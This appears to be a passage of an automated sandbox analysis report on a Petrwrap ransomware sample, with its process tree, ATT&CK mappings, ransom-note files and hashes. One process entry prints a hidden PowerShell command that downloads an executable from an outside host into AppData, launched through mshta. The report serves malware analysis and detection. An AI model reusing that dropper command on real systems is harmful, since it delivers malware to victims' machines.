  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5360,i,3549687482470712809,4018206417633110462,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5308 /prefetch:8
  2⤵
  PID:4888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3532,i,3549687482470712809,4018206417633110462,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5292 /prefetch:8
  2⤵
  PID:4960
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3344,i,3549687482470712809,4018206417633110462,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4032 /prefetch:1
  2⤵
  PID:2892

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4172

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:832

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:2216

C:\Users\Admin\Downloads\Ransomware-Samples-main\Ransomware-Samples-main\Petrwrap\Ransomware.Petrwrap\svchost.exe
"C:\Users\Admin\Downloads\Ransomware-Samples-main\Ransomware-Samples-main\Petrwrap\Ransomware.Petrwrap\svchost.exe"
1⤵
- Drops startup file
- Drops desktop.ini file(s)
- Drops file in Windows directory
PID:2632

C:\Users\Admin\Downloads\Ransomware-Samples-main\Ransomware-Samples-main\Petrwrap\Ransomware.Petrwrap\svchost.exe
"C:\Users\Admin\Downloads\Ransomware-Samples-main\Ransomware-Samples-main\Petrwrap\Ransomware.Petrwrap\svchost.exe"
1⤵
PID:1524

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\Ransomware-Samples-main\Ransomware-Samples-main\Petrwrap\Ransomware.Petrwrap\myguy.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1732
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', 'C:\Users\Admin\AppData\Roaming\1726.exe');
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:1584

C:\Users\Admin\Downloads\Ransomware-Samples-main\Ransomware-Samples-main\Petrwrap\Ransomware.Petrwrap\svchost.exe
"C:\Users\Admin\Downloads\Ransomware-Samples-main\Ransomware-Samples-main\Petrwrap\Ransomware.Petrwrap\svchost.exe"
1⤵
PID:3472

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4480

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
264B

MD5
845c45ebdcc318f84b2640b5a9949d1a

SHA1
153b402dd971d86111f6e5a2304e82bae6181517

SHA256
a662106873014bd04849392ac2ff88a5fe78ce0a014cf3d8a54a51bade0703ad

SHA512
27e0158dc07ed2fbd8a38f490592d64471ffbb4f8351e0b9f964a02373736d9461ea0dfc83b6f89c3079248b7b5aae06ea4744d48963ba75c23d1ad56a128916

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

Filesize
264KB

MD5
edffaef5054d4645d52c3f491f1d8956

SHA1
9fa309327055188f1af702185d498f49daecb58c

SHA256
c00ab2a4f6a44d54a5d80afe30856c3f19c05b258aac53dbd77607ba4466cf27

SHA512
9c7ea0c90e227fbba439621e24fd3c0858ffd42cd8bfeb9cce99e32df8b8ce185805e814c4c66a382b14ac03671ef2c799e2c672dff09bade491b3f1a8b43b85

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
bf0a98626ac0140ae78194ee47a6e726

SHA1
aeaf4ea2ad35120e03faba613dfcb1373908a92e

SHA256
de05567d980fc2c0f02aa385994f7df6ff56c7103f83e62a3cc2990314612cd2

SHA512
5e84eb88d29689987c89d8d8d9e16c6dd62af53fb63aafbc2e49cdce058a6ae31288ed20385ed4e9cc0615feb9aefbc3811386d58536cd2e469133db9e52c439

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
524B

MD5
99c2c0333a023f98d06379c46a23cf07

SHA1
33b717db391e203c16bab872348452ca1c3932e3

SHA256
89193794b171914a187f7c8dfcc1817b1c261d06e683950f37fef6d3ac24db62

SHA512
44e11ed56ee494233ac8d3c7a2f753fe744addd2dffd515eb967097c2e80fb6debec54cdd83dd3fe2a7382d64b2583c2ce765d282f4c58f1fe5e5963ed9a388f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
524B

MD5
a7d1ee3f94a05fc0b21492d27933d1b1

SHA1
1cd579ab21bef17e22919b0688f0cad69e39e210

SHA256
d9a471862767c3a843390b3946da7440dee17c3cb6c0daa9ebd29076e4885c44

SHA512
626465f360e3d12a007c078a273ab8580c4553a257ad693dccd45a9f3189711fee37e5afe01e815eec1a5c55faf5b35f56665a045751a749d681fc370827da8f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
524B

MD5
84cf014614861815ab4db43fc5c8fc88

SHA1
1d15fc20884b584ac05c2ba92770b193a10b0e98

SHA256
de4f23aee19da365e5125d177a44e2d03a044446c2ff0f371fa76008d4e52bc0

SHA512
137a6c6ece481097df1da6d7460a7bb3a602e2d9a9a994639222c8f70efe70efdc6cca64508c1da3b94a209b0fe281411ad1c2bc98ea5c5dedc947d0d8feceb4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
2256921517047dca9b14b3ec48ca1519

SHA1
d0dbd87dc08233986a84343283a8724f21eaf978

SHA256
189e0e200c3deb582733953079c83e2ce2971e476bce29813171fee9b85746cd

SHA512
88c1dba2bc1af9703a3a35facdfa3319251901ca4758d8c20baa110b5974947ff126503c17793a282c17693e3da6da2cf81e239dd6ea9a72d063aa6b8bb65f4f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
fc9a3baddeef61edf2b70ca520265860

SHA1
8babfa7545bfecbdc41d1ff2ef4f81493867a08b

SHA256
7ac98a1916a0ada2f3e610e261a303379f8d792a01a1c17cbf20831171af4df6

SHA512
487435d73e1fb6220ca84eea4bc04b1889ffaa017acaa2747df0859b2939632822d5455f87ae36ee283e633941021d4720430dbb66137a0a66bc2a208e49efd9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
35991b5e1b84b71a34526fe122a45a96

SHA1
fc4b36cb2ae52f9359ddb0e4421e8f0b2a3d8431

SHA256
6de56cb4eadad7c5d1192b3e664e8b7ce8d0b2bfe630a1ffb0796568edc75c44

SHA512
c3c97859c9c41cc61398d2502608a5c2d9de7ecc38a2865098cb3db2cd9e90fb3d73e7df2267ecabdd873f68b66eb614c9a36700e68c272e44a8d9be7b6d5d3e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
0a25f61ccf8f8ac34c3ac9b1f3305d9d

SHA1
6aba873f50aa814e79cea1ce49d3bbe2ab4a4ba4

SHA256
7a08005a1ea47c8bebdd56ca65d37e71babba64bdf976d8f7c08e5a39257b7c5

SHA512
28e6015b2aa9fe5fd1d61b34dbabde12891c6dda90eef7ede60e5e91f8bda93275ae52f84fe954ab74c3465c2ec9e9a2f9df015ed0e15deb27580f1c33574913

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
c22411ef3f4dc7c00e9eab776263aac3

SHA1
c607a970ad25a93b376764d00d0e85755a7abbf7

SHA256
85dd37ff479cbe3a2f3b46ea72ed8d9b5d9b8fc5a8918c286bed534496746149

SHA512
81b8f4f70b9ed3d89a591697f599a1ca1c5e8c3dfc67ec004f3fd805a88499283c39f1afdafc101b7abaad885fa260f24e3982cad7abcdfd62fe0613c2c9a44d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
08585c0bc9c26248a004d08ee88b858b

SHA1
3609c068fa94aec3b080f9d791cfad3fb7b5f44b

SHA256
6955b9c397e6949f7e1be744e48bd731187bddcc1313f8ad8692ec5c0a7d1a3d

SHA512
d235cd3a262b3740da484c9088267d33426983be0eaf7f92ead84c2b9ed23499cae0759b9d812bc38e249c2d1bdda87dcd4cf4bef18b56b4082632556bebad30

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
8bdac785b3ff631ef5c8c1b397b13fa2

SHA1
3b901181b4567dd95d509dce502d437cb1bad1e1

SHA256
679a4257ca34e855783b233c4816f9c960e7d434a057b4f34daa4db434ae8796

SHA512
8982844e65c2f50dbbbaf3608afba0faabe7c0759b8247fff808a111d2352f0d68f59f621412ab55a39b184a7b09aa14aacf743ea355d2c886c2b861a816422a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
b069f03dc3cd50f1793835f4ab691804

SHA1
56d550c77727d1270e09ac51cdf51c8d747e2934

SHA256
ca10e3a1c1a66455d15759b39f6ec81666f7ca78d0b2c17e441b101cf65f009c

SHA512
39681159d8be9308780ccae7d2b03b3dafaee49c07e4c4724dd0226178f3cdecee89ba0920bc6173cf2e27717dfbcbaa7c8ceeb6100cba00f0cb75691c27ce4b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
195KB

MD5
89d2d3eb54eb2cf53f8d6b018846cf17

SHA1
3e28cf7ac5fb3141402f55f0a8a6daf9007254a6

SHA256
cb851b88f6f43b252eec833216c50237b03ee133ffea55dac97833b1cafc42c9

SHA512
ff8a1f94c9425d53fe857b29b2fd5eaaf7373372a2f47328839677c4747fcfc172cbf86f9d4f52b0e6dfd74fc21d55d3f16a8e611d4575ef5899256884d6733d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
195KB

MD5
4b9e602aa347f10ab738cb29e4e6283c

SHA1
cabfbcbd00da94099800ed1280fbf42490450494

SHA256
a9b8a26e09c8e970a856e8211a24ba3577440246d49fa37577159880b4f7a826

SHA512
a20f6c7cbee1a8edd02673576da5625bd0684dd88e07cb7604d83cb868f34dd14912aa367e3a2e518f31165f68e5fca78f5d201f65dab920f8583d5d70014b8f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
195KB

MD5
c9e3af85877d0cdbab2752813e24771d

SHA1
26727e7703c5efb42b9cc6c65f2f1d87436bc218

SHA256
93b1aeb53c3148e521d64d2eefacfdeec056b3ff18d111165b032f280d6977cd

SHA512
8133378a7ea2c487b6a4f99ce0c53b402290eab909c67e8289117e3b56e7ce46316cedec7b06d1dc2c2e38b005bad30b854e0b36146154f30f897e16506223dc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
195KB

MD5
a9fd312daf7e531e07452e7fc4aed8cd

SHA1
623f778bdb9f19c5e321f59ee7279e889d7244a4

SHA256
dbb736213c31f404dd4e32304a055a53bb15b69ac8241be13a5b6141c444532d

SHA512
deab5de5d6a0c262beed13aefc05c01fbfcb4cc2d67fd194a18af7ecd8759048ed00545776121ce61a195b467591f43bb0d115f83a985ec7ffefb81de91f8aef

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
195KB

MD5
628f85e99d39e2660fb7b2cc71d6a827

SHA1
0cc98cd9d1aaf3fe8e736bee3218ffbfb9803742

SHA256
16125df89fb4d49e27b2cd87995f9cffc83ed975d9ff5fcda8464f63c0864f28

SHA512
49e46683d130bd80eeb7d394e5488a9324aef9be149396f096dfa842fa2040e73e9dcf4a45e2bac9fcd3fa50ba64e2a0815b73369ae1baf4bb6446b953461ac2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\svchost.exe.log

Filesize
404B

MD5
7f3a014f782b0cd4588bb7b4019e210b

SHA1
53e3e88f62eb3b4fd2c02c2a057da741e6af25bc

SHA256
b3b577fbb6cff55612927985737e574278ac115ac8d3e5f74d6a3c50b28dfc81

SHA512
f87a72a390446dd6af7c169146634182a1a3211891cdf2a51a3bdca5dd7994f76e2d91259e96c83ced26e57215f501381ec0b27f8a53cb33ea002a3bee999be5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
53bc70ecb115bdbabe67620c416fe9b3

SHA1
af66ec51a13a59639eaf54d62ff3b4f092bb2fc1

SHA256
b36cad5c1f7bc7d07c7eaa2f3cad2959ddb5447d4d3adcb46eb6a99808e22771

SHA512
cad44933b94e17908c0eb8ac5feeb53d03a7720d97e7ccc8724a1ed3021a5bece09e1f9f3cec56ce0739176ebbbeb20729e650f8bca04e5060c986b75d8e4921

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e765f3d75e6b0e4a7119c8b14d47d8da

SHA1
cc9f7c7826c2e1a129e7d98884926076c3714fc0

SHA256
986443556d3878258b710d9d9efbf4f25f0d764c3f83dc54217f2b12a6eccd89

SHA512
a1872a849f27da78ebe9adb9beb260cb49ed5f4ca2d403f23379112bdfcd2482446a6708188100496e45db1517cdb43aba8bb93a75e605713c3f97cd716b1079

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
255B

MD5
d11edf9e08a127c768843acea41d0bc5

SHA1
ff1af9b39de4a3f547407fd9864ffdd2bb6c7354

SHA256
217e4d9d1412e45abf7a653f72a5ab8b53bc8fc6f377f52a042668a41abc7478

SHA512
92c3f0def567b0e2f2523ed25eb9d4abff06070b8be744fea4a6678f25f292439d7bc0c8015eaa6281b7f43149eebb3d3821cd6d6436598481113694b11ddea3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
c9f8a25e1cc065cd138a3ffdbdb1af73

SHA1
09eaab3afb6604871a953bcd57b79e1df1a1b9aa

SHA256
1c6f1b19b5ec63010737d7fc47be228bff1b52a61e4d63858fb7576457edd261

SHA512
3903b092627cd6bbb85fdac3b4baaaea1119ecd1193ef5cec1c68dbd3405d38173181bdadb4c4534ce6b5d84516e2af3ed6d2dc42d2af090df6cda1688a43418

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
568eb2bfb8e19da1462276dead6fec95

SHA1
db2e091c5cc8a72e301f4d9ce20efd732c1574a4

SHA256
e1f89172abbadb4177f7dbc51c4e8c26ea44a1f43f7ee4c5fd42ba5928a521ef

SHA512
ee2c62363f44c5e8ad7d646ace0a755801c3b919043b9d8da8a6c8637a9788c70464f5a43749f1e5a062be92306d2624c5b10059e6af086c937a5f8ebfa80438

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
70d54013ddc6116d8833aaba7c5180f7

SHA1
18ceace75090a4f0317586787f7305da92406a57

SHA256
accfb37e77a2d5723613c4da04a06b0ceb3b345daca10cf3ace5637ea93d49df

SHA512
841f22d0001d0b1226990b1d734a7edb8b4e547bf123f009a9837b84e4dadfe060cf0a242c8c99cb99eaf68c4fb9adc4e40b923d4033f84d9c3af965c768d278

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
80a457ed50cee2a76c684d265f4a8b71

SHA1
197847d7bb3f26c07103435153b92a6cbde47339

SHA256
51513d1e47f0ab9801c2fc94b623b3c35d1b7390c62c799bacff19236da3ffd1

SHA512
6673dd972c4ee05b45b2481fee03705eb921aa2ad0dcb97c28dc48fc4ec6827b7c8c53de7cd6523be7bcf9cf240467b73795e4c68d0ea7d5e755bbad32bad45a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
7f2cf5f81e60fd6fa50dd173f7e3ff48

SHA1
b8f832435c5f3defce6fd87ac26a9877ae82a8e1

SHA256
e1818a5f0d3fd4e5f7146fac6ec41a01c36022f7f1e6a3a43fced934ec739a24

SHA512
62431785327166c6b984d6d246f32d70f3eed0447affe3eb5e7eeab039710f7d0758296518acfa419975959e8008672f7be148e7fad73d2c2558b682eaa77675

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
9efa8884b16c01683cc8ad0e4f10dcd9

SHA1
00813fb068bdbe9794f0a911ad625ab5920894c6

SHA256
f801e2a1366a52f63a122f836daf49655d57cd83cdcd4ad33eb985a947343145

SHA512
43a7cbfb0c1a558b67c038e1cf37f5dd946776d116fa24c341477a5e81fc9f06fb999e09e777dc3edffb1b786687a56e699ccd6b624b10fa0acb047158b80b8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5jtda233.5o5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\OneNote\16.0\_R_E_A_D___T_H_I_S___EH54_.hta

Filesize
75KB

MD5
86f7178802c8c157edcfb10ffe04c0f3

SHA1
3181862320b38b3ccc9c10f3b87872419a9b8c42

SHA256
c8492cb252a892ba17cae316feb24425d18e34e8dd266c081b03fc8f2061cfe3

SHA512
5251bff9652c27ee67d12cc590fca03a52ecdd609466c9a7c5aaaf6dfb9d4f7b3de70e2644837b46826264227f5c6b03fbd1e037ecc7ec726bf711f3ec8823d4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\OneNote\16.0\_R_E_A_D___T_H_I_S___JLFC_.txt

Filesize
1KB

MD5
c01495886fb23d34a3d72fee6503aefd

SHA1
377d03383c81d54fb00bd3217ab637fe15509df7

SHA256
c375681cbfadaf6e8ec2e844702df866ce82734f79d65eac38ef859e75936fe7

SHA512
d364a8e707c4c540889ae9a6d94f6c4c35886ab4556225cfd2b494ffba9303325c8f8eec257cd76345528259423b17feba98c6dcec7d6eaa355bb6fa3598d875

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 434655.crdownload

Filesize
15.1MB

MD5
e88a0140466c45348c7b482bb3e103df

SHA1
c59741da45f77ed2350c72055c7b3d96afd4bfc1

SHA256
bab1853454ca6fdd3acd471254101db1b805b601e309a49ec7b4b1fbcfc47ad7

SHA512
2dc9682f4fb6ea520acc505bdbe7671ab7251bf9abd25a5275f0c543a6157d7fa5325b9dce6245e035641ab831d646f0e14f6649f9464f5e97431ab1bf7da431

Download Submit
memory/1088-252-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/1088-678-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/1088-703-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/1088-155-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/1584-964-0x0000000002B50000-0x0000000002B86000-memory.dmp

Filesize
216KB

Download
memory/1584-980-0x0000000006150000-0x000000000616E000-memory.dmp

Filesize
120KB

Download
memory/1584-965-0x00000000055E0000-0x0000000005C08000-memory.dmp

Filesize
6.2MB

Download
memory/1584-966-0x0000000005190000-0x00000000051B2000-memory.dmp

Filesize
136KB

Download
memory/1584-967-0x0000000005330000-0x0000000005396000-memory.dmp

Filesize
408KB

Download
memory/1584-968-0x00000000053A0000-0x0000000005406000-memory.dmp

Filesize
408KB

Download
memory/1584-983-0x0000000006620000-0x000000000663A000-memory.dmp

Filesize
104KB

Download
memory/1584-978-0x0000000005C10000-0x0000000005F64000-memory.dmp

Filesize
3.3MB

Download
memory/1584-982-0x0000000007BE0000-0x000000000825A000-memory.dmp

Filesize
6.5MB

Download
memory/1584-981-0x0000000006190000-0x00000000061DC000-memory.dmp

Filesize
304KB

Download
memory/2632-952-0x000000001BF20000-0x000000001BF82000-memory.dmp

Filesize
392KB

Download
memory/2632-954-0x000000001D5F0000-0x000000001D642000-memory.dmp

Filesize
328KB

Download
memory/2632-953-0x000000001B370000-0x000000001B378000-memory.dmp

Filesize
32KB

Download
memory/2632-951-0x000000001BE00000-0x000000001BE9C000-memory.dmp

Filesize
624KB

Download
memory/2632-950-0x000000001B890000-0x000000001BD5E000-memory.dmp

Filesize
4.8MB

Download
memory/4472-156-0x0000000000440000-0x0000000000451000-memory.dmp

Filesize
68KB

Download